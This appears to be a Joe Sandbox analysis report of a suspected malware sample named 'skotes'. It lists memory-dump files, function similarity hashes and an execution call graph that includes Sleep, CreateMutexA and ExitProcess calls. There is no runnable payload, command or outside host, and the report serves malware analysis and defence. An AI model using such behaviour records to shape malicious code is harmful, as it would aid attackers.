                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                                          • Instruction ID: dd05b4bd6bc9a135e851fbdd7a7336a55597385e22180c520d6f357ff6532f2f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB1F232D042C59FDB25CF2AC881BBEBBA5EF45350F24416AF855EB241D6399D03DBA0
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.1385140605.0000000000FB1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385125003.0000000000FB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385140605.0000000001012000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385194038.0000000001019000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385212908.000000000101B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385229065.0000000001025000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385242583.0000000001026000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385257016.0000000001027000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385346627.000000000117F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385362772.0000000001182000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.0000000001192000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385409001.00000000011A5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385423544.00000000011A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385441710.00000000011B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385457737.00000000011B8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385475492.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385493764.00000000011CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385511986.00000000011D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385528459.00000000011E2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385549136.00000000011FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385564912.0000000001201000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385579394.0000000001202000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385597548.0000000001206000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385612866.0000000001207000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385630220.000000000120B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385649820.000000000121A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385667176.000000000121E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385685019.000000000122B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385703498.000000000122F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385717855.0000000001230000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385733345.0000000001232000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385748036.0000000001233000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385765595.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385783876.000000000124A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.000000000124B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385799848.0000000001279000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385919410.00000000012A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1385960284.00000000012A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386020740.00000000012A6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386058636.00000000012AA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386092620.00000000012AD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386139476.00000000012BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.1386153484.00000000012BB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_fb0000_skotes.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                                                                          • Opcode ID: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
                                                                                                                                                                                                                                                                                          • Instruction ID: 632d9fab2a9d2fe0873d983d54fb034023beb8ec72c64e01e7aef8ded841783b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2d4ff15728042e7e75c12b8726096b043d64bbbd8d56fde7004660af079a0ed
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF211D75E0011AAFDF01EBA4DE82EBEB7B9EF48710F11005DF505A7251DB399D01ABA1

                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                          Execution Coverage:0.9%
                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                          Total number of Nodes:614
                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                          execution_graph 10428 fe8bbe 10429 fe8868 3 API calls 10428->10429 10430 fe8bdc 10429->10430 10300 fbcc79 10302 fbcc84 shared_ptr 10300->10302 10301 fbccda shared_ptr __floor_pentium4 10302->10301 10303 fb5c10 3 API calls 10302->10303 10304 fbce9d 10303->10304 10306 fbca70 10304->10306 10307 fbcadd 10306->10307 10308 fb5c10 3 API calls 10307->10308 10315 fbcc87 10307->10315 10310 fbccf9 10308->10310 10309 fbccda shared_ptr __floor_pentium4 10316 fb9030 10310->10316 10312 fb5c10 3 API calls 10313 fbce9d 10312->10313 10314 fbca70 3 API calls 10313->10314 10315->10309 10315->10312 10317 fb907f 10316->10317 10318 fb5c10 3 API calls 10317->10318 10319 fb909a shared_ptr __floor_pentium4 10318->10319 10319->10315 10156 fb9ab8 10158 fb9acc 10156->10158 10159 fb9b08 10158->10159 10160 fba917 10159->10160 10162 fb9b4b shared_ptr 10159->10162 10161 fba953 Sleep CreateMutexA 10160->10161 10166 fba98e 10161->10166 10163 fb9b59 10162->10163 10164 fb5c10 3 API calls 10162->10164 10165 fb9b7c 10164->10165 10167 fb8b30 3 API calls 10165->10167 10168 fb9b8d 10167->10168 10169 fb5c10 3 API calls 10168->10169 10170 fb9cb1 10169->10170 10171 fb8b30 3 API calls 10170->10171 10172 fb9cc2 10171->10172 10173 fb42b0 10176 fb3ac0 10173->10176 10175 fb42bb shared_ptr 10177 fb3af9 10176->10177 10178 fb3b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 10177->10178 10181 fb3c38 10177->10181 10186 fb32d0 10177->10186 10178->10175 10180 fb32d0 5 API calls 10183 fb3c5f 10180->10183 10181->10180 10181->10183 10182 fb3c68 10182->10175 10183->10182 10205 fb3810 10183->10205 10187 fcc6ac GetSystemTimePreciseAsFileTime 10186->10187 10194 fb3314 10187->10194 10188 fb336b 10189 fcc26a 4 API calls 10188->10189 10190 fb333c __Mtx_unlock 10189->10190 10192 fcc26a 4 API calls 10190->10192 10195 fb3350 __floor_pentium4 10190->10195 10191 fcbd4c GetSystemTimePreciseAsFileTime 10191->10194 10193 fb3377 10192->10193 10196 fcc6ac GetSystemTimePreciseAsFileTime 10193->10196 10194->10188 10194->10190 10194->10191 10195->10181 10197 fb33af 10196->10197 10198 fcc26a 4 API calls 10197->10198 10199 fb33b6 __Cnd_broadcast 10197->10199 10198->10199 10200 fcc26a 4 API calls 10199->10200 10201 fb33d7 __Mtx_unlock 10199->10201 10200->10201 10202 fcc26a 4 API calls 10201->10202 10203 fb33eb 10201->10203 10204 fb340e 10202->10204 10203->10181 10204->10181 10206 fb381c 10205->10206 10209 fb2440 10206->10209 10212 fcb5d6 10209->10212 10211 fb2472 10213 fcb5f1 std::_Throw_future_error 10212->10213 10214 fe8bec __cftof 3 API calls 10213->10214 10216 fcb658 __cftof __floor_pentium4 10213->10216 10215 fcb69f 10214->10215 10216->10211 10347 fb55f0 10348 fb5610 10347->10348 10349 fb22c0 3 API calls 10348->10349 10350 fb5710 __floor_pentium4 10348->10350 10349->10348 10351 fb43f0 10352 fcbedf InitOnceExecuteOnce 10351->10352 10353 fb440a 10352->10353 10354 fb4411 10353->10354 10355 fe6cbb 3 API calls 10353->10355 10356 fb4424 10355->10356 10454 fb2170 10457 fcc6fc 10454->10457 10456 fb217a 10458 fcc70c 10457->10458 10459 fcc724 10457->10459 10458->10459 10461 fccfbe 10458->10461 10459->10456 10462 fcccd5 __Mtx_init_in_situ InitializeCriticalSectionEx 10461->10462 10463 fccfd0 10462->10463 10463->10458 10464 fb3970 10465 fcc68b __Mtx_init_in_situ 2 API calls 10464->10465 10466 fb39a7 10465->10466 10467 fcc68b __Mtx_init_in_situ 2 API calls 10466->10467 10468 fb39e6 10467->10468 9751 fc9ef0 9752 fc9f0c 9751->9752 9755 fcc68b 9752->9755 9754 fc9f17 9758 fcc3d5 9755->9758 9757 fcc69b 9757->9754 9759 fcc3e1 9758->9759 9760 fcc3eb 9758->9760 9761 fcc3be 9759->9761 9763 fcc39e 9759->9763 9760->9757 9771 fccd0a 9761->9771 9763->9760 9767 fcccd5 9763->9767 9765 fcc3d0 9765->9757 9768 fcc3b7 9767->9768 9769 fccce3 InitializeCriticalSectionEx 9767->9769 9768->9757 9769->9768 9772 fccd1f RtlInitializeConditionVariable 9771->9772 9772->9765 10320 fb4276 10321 fb2410 4 API calls 10320->10321 10322 fb427f 10321->10322 10217 fb5cad 10219 fb5caf shared_ptr __cftof 10217->10219 10218 fb5d17 shared_ptr __floor_pentium4 10219->10218 10220 fb5c10 3 API calls 10219->10220 10221 fb66ac 10220->10221 10222 fb5c10 3 API calls 10221->10222 10223 fb66b1 10222->10223 10224 fb22c0 3 API calls 10223->10224 10225 fb66c9 shared_ptr 10224->10225 10226 fb5c10 3 API calls 10225->10226 10227 fb673d 10226->10227 10228 fb22c0 3 API calls 10227->10228 10230 fb6757 shared_ptr 10228->10230 10229 fb5c10 3 API calls 10229->10230 10230->10229 10231 fb22c0 3 API calls 10230->10231 10232 fb6852 shared_ptr __floor_pentium4 10230->10232 10231->10230 9730 fe6629 9733 fe64c7 9730->9733 9734 fe64d5 __cftof 9733->9734 9735 fe6520 9734->9735 9738 fe652b 9734->9738 9737 fe652a 9744 fea302 GetPEB 9738->9744 9740 fe6535 9741 fe654a __cftof 9740->9741 9742 fe653a GetPEB 9740->9742 9743 fe6562 ExitProcess 9741->9743 9742->9741 9745 fea31c __cftof 9744->9745 9745->9740 10233 fb20a0 10234 fcc68b __Mtx_init_in_situ 2 API calls 10233->10234 10235 fb20ac 10234->10235 10357 fb3fe0 10358 fb4022 10357->10358 10359 fb408c 10358->10359 10360 fb40d2 10358->10360 10363 fb4035 __floor_pentium4 10358->10363 10364 fb35e0 10359->10364 10370 fb3ee0 10360->10370 10365 fb3616 10364->10365 10369 fb364e Concurrency::cancel_current_task shared_ptr __floor_pentium4 10365->10369 10376 fb2ce0 10365->10376 10367 fb369e 10367->10369 10385 fb2c00 10367->10385 10369->10363 10371 fb3f48 10370->10371 10373 fb3f1e 10370->10373 10372 fb2c00 3 API calls 10371->10372 10375 fb3f58 10371->10375 10374 fb3f7f 10372->10374 10373->10363 10374->10363 10375->10363 10377 fb2d1d 10376->10377 10378 fcbedf InitOnceExecuteOnce 10377->10378 10379 fb2d46 10378->10379 10380 fb2d51 __floor_pentium4 10379->10380 10381 fb2d88 10379->10381 10392 fcbef7 10379->10392 10380->10367 10383 fb2440 3 API calls 10381->10383 10384 fb2d9b 10383->10384 10384->10367 10386 fb2c0e 10385->10386 10405 fcb847 10386->10405 10388 fb2c42 10389 fb2c49 10388->10389 10411 fb2c80 10388->10411 10389->10369 10391 fb2c58 std::_Throw_future_error 10393 fcbf03 std::_Throw_future_error 10392->10393 10394 fcbf6a 10393->10394 10395 fcbf73 10393->10395 10399 fcbe7f 10394->10399 10396 fb2ae0 4 API calls 10395->10396 10398 fcbf6f 10396->10398 10398->10381 10400 fccc31 InitOnceExecuteOnce 10399->10400 10401 fcbe97 10400->10401 10402 fcbe9e 10401->10402 10403 fe6cbb 3 API calls 10401->10403 10402->10398 10404 fcbea7 10403->10404 10404->10398 10406 fcb854 10405->10406 10410 fcb873 Concurrency::details::_Reschedule_chore 10405->10410 10414 fccb77 10406->10414 10408 fcb864 10408->10410 10416 fcb81e 10408->10416 10410->10388 10422 fcb7fb 10411->10422 10413 fb2cb2 shared_ptr 10413->10391 10415 fccb92 CreateThreadpoolWork 10414->10415 10415->10408 10417 fcb827 Concurrency::details::_Reschedule_chore 10416->10417 10420 fccdcc 10417->10420 10419 fcb841 10419->10410 10421 fccde1 TpPostWork 10420->10421 10421->10419 10423 fcb817 10422->10423 10424 fcb807 10422->10424 10423->10413 10424->10423 10426 fcca78 10424->10426 10427 fcca8d TpReleaseWork 10426->10427 10427->10423 10522 fb4120 10523 fb416a 10522->10523 10524 fb3ee0 3 API calls 10523->10524 10525 fb41b2 __floor_pentium4 10523->10525 10524->10525 10436 fb9ba5 10437 fb9ba7 10436->10437 10438 fb5c10 3 API calls 10437->10438 10439 fb9cb1 10438->10439 10440 fb8b30 3 API calls 10439->10440 10441 fb9cc2 10440->10441 10485 fb215a 10486 fcc6fc InitializeCriticalSectionEx 10485->10486 10487 fb2164 10486->10487 10442 fb3f9f 10443 fb3fad 10442->10443 10445 fb3fb6 10442->10445 10444 fb2410 4 API calls 10443->10444 10444->10445 9773 fb9adc 9776 fb9aea shared_ptr 9773->9776 9774 fba917 9775 fba953 Sleep CreateMutexA 9774->9775 9777 fba98e 9775->9777 9776->9774 9778 fb9b4b shared_ptr 9776->9778 9780 fb9b59 9778->9780 9788 fb5c10 9778->9788 9781 fb9b7c 9806 fb8b30 9781->9806 9783 fb9b8d 9784 fb5c10 3 API calls 9783->9784 9785 fb9cb1 9784->9785 9786 fb8b30 3 API calls 9785->9786 9787 fb9cc2 9786->9787 9789 fb5c54 9788->9789 9816 fb4b30 9789->9816 9791 fb5d17 shared_ptr __floor_pentium4 9791->9781 9792 fb5c7b shared_ptr __cftof 9792->9791 9793 fb5c10 3 API calls 9792->9793 9794 fb66ac 9793->9794 9795 fb5c10 3 API calls 9794->9795 9796 fb66b1 9795->9796 9820 fb22c0 9796->9820 9798 fb66c9 shared_ptr 9799 fb5c10 3 API calls 9798->9799 9800 fb673d 9799->9800 9801 fb22c0 3 API calls 9800->9801 9803 fb6757 shared_ptr 9801->9803 9802 fb5c10 3 API calls 9802->9803 9803->9802 9804 fb22c0 3 API calls 9803->9804 9805 fb6852 shared_ptr __floor_pentium4 9803->9805 9804->9803 9805->9781 9807 fb8b7c 9806->9807 9808 fb5c10 3 API calls 9807->9808 9810 fb8b97 shared_ptr 9808->9810 9809 fb8d01 shared_ptr __floor_pentium4 9809->9783 9810->9809 9811 fb5c10 3 API calls 9810->9811 9813 fb8d9a shared_ptr 9811->9813 9812 fb8e7e shared_ptr __floor_pentium4 9812->9783 9813->9812 9814 fb5c10 3 API calls 9813->9814 9815 fb8f1a shared_ptr __floor_pentium4 9814->9815 9815->9783 9817 fb4ce5 9816->9817 9819 fb4b92 9816->9819 9817->9792 9819->9817 9823 fe6da6 9819->9823 9940 fb2280 9820->9940 9824 fe6db4 9823->9824 9825 fe6dc2 9823->9825 9828 fe6d19 9824->9828 9825->9819 9833 fe690a 9828->9833 9832 fe6d3d 9832->9819 9834 fe692a 9833->9834 9840 fe6921 9833->9840 9834->9840 9847 fea671 9834->9847 9841 fe6d52 9840->9841 9842 fe6d8f 9841->9842 9844 fe6d5f 9841->9844 9932 feb67d 9842->9932 9845 fe6d6e 9844->9845 9927 feb6a1 9844->9927 9845->9832 9851 fea67b __dosmaperr ___free_lconv_mon 9847->9851 9848 fe694a 9852 feb5fb 9848->9852 9851->9848 9860 fe8bec 9851->9860 9853 feb60e 9852->9853 9855 fe6960 9852->9855 9853->9855 9886 fef5ab 9853->9886 9856 feb628 9855->9856 9857 feb63b 9856->9857 9859 feb650 9856->9859 9857->9859 9893 fee6b1 9857->9893 9859->9840 9861 fe8bf1 __cftof 9860->9861 9862 fe8bfc __cftof 9861->9862 9866 fed634 9861->9866 9880 fe65ed 9862->9880 9867 fed640 __cftof __dosmaperr 9866->9867 9868 fed69c __dosmaperr ___std_exception_copy 9867->9868 9869 fed81b __dosmaperr 9867->9869 9870 fed726 9867->9870 9871 fed751 __cftof 9867->9871 9868->9862 9872 fe65ed __cftof 3 API calls 9869->9872 9870->9871 9883 fed62b 9870->9883 9871->9868 9875 fea671 __cftof 3 API calls 9871->9875 9878 fed7a5 9871->9878 9874 fed82e 9872->9874 9875->9878 9877 fed62b __cftof 3 API calls 9877->9871 9878->9868 9879 fea671 __cftof 3 API calls 9878->9879 9879->9868 9881 fe64c7 __cftof 3 API calls 9880->9881 9882 fe65fe 9881->9882 9884 fea671 __cftof 3 API calls 9883->9884 9885 fed630 9884->9885 9885->9877 9887 fef5b7 __dosmaperr 9886->9887 9888 fea671 __cftof 3 API calls 9887->9888 9890 fef5c0 __cftof __dosmaperr 9888->9890 9889 fef606 9889->9855 9890->9889 9891 fe8bec __cftof 3 API calls 9890->9891 9892 fef62b 9891->9892 9894 fea671 __cftof 3 API calls 9893->9894 9895 fee6bb 9894->9895 9898 fee5c9 9895->9898 9897 fee6c1 9897->9859 9902 fee5d5 __cftof __dosmaperr ___free_lconv_mon 9898->9902 9899 fee5f6 9899->9897 9900 fe8bec __cftof 3 API calls 9901 fee668 9900->9901 9903 fee6a4 9901->9903 9907 fea72e 9901->9907 9902->9899 9902->9900 9903->9897 9908 fea739 __dosmaperr ___free_lconv_mon 9907->9908 9909 fe8bec __cftof 3 API calls 9908->9909 9911 fea7be 9908->9911 9910 fea7c7 9909->9910 9912 fee4b0 9911->9912 9913 fee5c9 __cftof 3 API calls 9912->9913 9914 fee4c3 9913->9914 9919 fee259 9914->9919 9916 fee4cb __cftof 9918 fee4dc __cftof __dosmaperr ___free_lconv_mon 9916->9918 9922 fee6c4 9916->9922 9918->9903 9920 fe690a __cftof GetPEB ExitProcess GetPEB 9919->9920 9921 fee26b 9920->9921 9921->9916 9923 fee259 __cftof GetPEB ExitProcess GetPEB 9922->9923 9926 fee6e4 __cftof 9923->9926 9924 fee75a __cftof __floor_pentium4 9924->9918 9925 fee32f __cftof GetPEB ExitProcess GetPEB 9925->9924 9926->9924 9926->9925 9928 fe690a __cftof 3 API calls 9927->9928 9929 feb6be 9928->9929 9931 feb6ce __floor_pentium4 9929->9931 9937 fef1bf 9929->9937 9931->9845 9933 fea671 __cftof 3 API calls 9932->9933 9934 feb688 9933->9934 9935 feb5fb __cftof 3 API calls 9934->9935 9936 feb698 9935->9936 9936->9845 9938 fe690a __cftof 3 API calls 9937->9938 9939 fef1df __cftof __freea __floor_pentium4 9938->9939 9939->9931 9941 fb2296 9940->9941 9944 fe87f8 9941->9944 9947 fe7609 9944->9947 9946 fb22a4 9946->9798 9948 fe7649 9947->9948 9952 fe7631 __dosmaperr ___std_exception_copy __floor_pentium4 9947->9952 9949 fe690a __cftof 3 API calls 9948->9949 9948->9952 9950 fe7661 9949->9950 9953 fe7bc4 9950->9953 9952->9946 9955 fe7bd5 9953->9955 9954 fe7be4 __dosmaperr ___std_exception_copy 9954->9952 9955->9954 9960 fe8168 9955->9960 9965 fe7dc2 9955->9965 9970 fe7de8 9955->9970 9980 fe7f36 9955->9980 9961 fe8178 9960->9961 9962 fe8171 9960->9962 9961->9955 9989 fe7b50 9962->9989 9964 fe8177 9964->9955 9966 fe7dcb 9965->9966 9967 fe7dd2 9965->9967 9968 fe7b50 3 API calls 9966->9968 9967->9955 9969 fe7dd1 9968->9969 9969->9955 9971 fe7e09 __dosmaperr ___std_exception_copy 9970->9971 9972 fe7def 9970->9972 9971->9955 9972->9971 9973 fe7f69 9972->9973 9975 fe7fa2 9972->9975 9978 fe7f77 9972->9978 9976 fe7f8b 9973->9976 9973->9978 10007 fe8241 9973->10007 9975->9976 10003 fe8390 9975->10003 9976->9955 9978->9976 10011 fe86ea 9978->10011 9981 fe7f4f 9980->9981 9982 fe7f69 9980->9982 9981->9982 9983 fe7fa2 9981->9983 9987 fe7f77 9981->9987 9984 fe8241 